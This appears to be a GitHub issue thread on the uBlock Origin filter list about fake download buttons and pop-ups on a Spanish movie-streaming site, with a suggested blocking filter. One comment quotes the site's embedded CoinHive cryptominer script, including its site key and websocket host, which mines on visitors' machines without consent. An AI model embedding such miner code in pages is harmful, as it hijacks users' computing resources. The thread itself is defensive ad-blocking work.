### ISSUE TITLE
aquipelis.net [Fake Button]

### ISSUE THREAD

**Issue by KiLL4FuNK** [uBlockOrigin/uAssets#1850]
URL(s) where the issue occurs

`https://aquipelis.net/star-wars-los-ultimos-jedi-online-2017-espanol/`

Describe the issue

![](https://i.imgur.com/7VxiIj2.png)
![](https://i.imgur.com/KgBJBTX.png)

Versions

Browser/version: Chrome 65.0.3325.181
uBlock Origin version: 1.15.18

Settings

Default

**Comment by KiLL4FuNK** [comment]
Fake Button

**Comment by lain566** [comment]
Fake button again, suggested filter
`aquipelis.tv##script:inject(abort-on-property-write.js, document.currentScript)`

 I think the site has a miner, I'm not sure
Test link
`https://aquipelis.tv/la-muerte-de-superman-online-2018-espanol-latino-descargar-pelicula-completa/`

**Comment by okiehsch** [comment]
> I think the site has a miner, I'm not sure

Yes, the site has a miner.
````
   CoinHive.CONFIG.WEBSOCKET_SHARDS = [['wss://wsservices.org']];
	var mscript = new CoinHive.User('sk9PVdCAMq0f2oGWFUA04ziemlFrydpR', userid, {
    throttle: 0.7,
    //autoThreads: true
});

    mscript.start();

console.log('start_min');

	// Listen on events
	mscript.on('found', function() { /*found*/ })
	mscript.on('accepted', function() { /*accepted*/ })

	// Update stats once per second
	setInterval(function() {
		var hashesPerSecond = mscript.getHashesPerSecond();
		var totalHashes = mscript.getTotalHashes();
		var acceptedHashes = mscript.getAcceptedHashes();

		// Output to HTML elements...
	}, 1000);
}
````

**Comment by lain566** [comment]
@okiehsch Ohh.. thanks.

**Comment by KiLL4FuNK** [comment]
Fake Button

**Comment by KiLL4FuNK** [comment]
Pop-up
